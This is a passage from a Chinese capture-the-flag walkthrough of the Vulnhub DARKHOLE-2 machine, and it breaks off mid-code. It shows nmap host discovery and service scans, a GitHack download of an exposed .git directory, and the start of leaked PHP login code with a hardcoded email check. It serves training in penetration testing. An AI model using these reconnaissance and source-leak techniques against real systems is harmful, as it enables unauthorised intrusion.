信息收集
主机信息收集:
┌──(kali㉿kali)-[~/Desktop/chall/vulnhub/DARKHOLE-2]
└─$ nmap -sP 192.168.139.135/24
Starting Nmap 7.92 ( https://nmap.org ) at 2022-03-29 08:13 EDT
Nmap scan report for 192.168.139.2
Host is up (0.0048s latency).
Nmap scan report for 192.168.139.134
Host is up (0.093s latency).
Nmap scan report for 192.168.139.135
Host is up (0.0014s latency).
Nmap done: 256 IP addresses (3 hosts up) scanned in 2.58 seconds
存活主机IP: 192.168.139.134
扫描目标:
nmap -A 192.168.139.134
可以发现:
- 开放80端口,存在一个git文件泄露
- 开放ssh端口
使用githack下载文件:
/usr/bin/python2.7 GitHack.py http://192.168.139.134:80/.git/
下载文件保存在dist文件夹下:
分析程序的源代码,发现没有什么问题,我们使用phpstrom
程序打开程序,可以看到git的历史立即,发现存在更改记录:
跳转分支可以看到代码修改的原始内容:
<?php
session_start();
require 'config/config.php';
if($_SERVER['REQUEST_METHOD'] == 'POST'){
if($_POST['email'] == "lush@admin.com" && $_POST['password'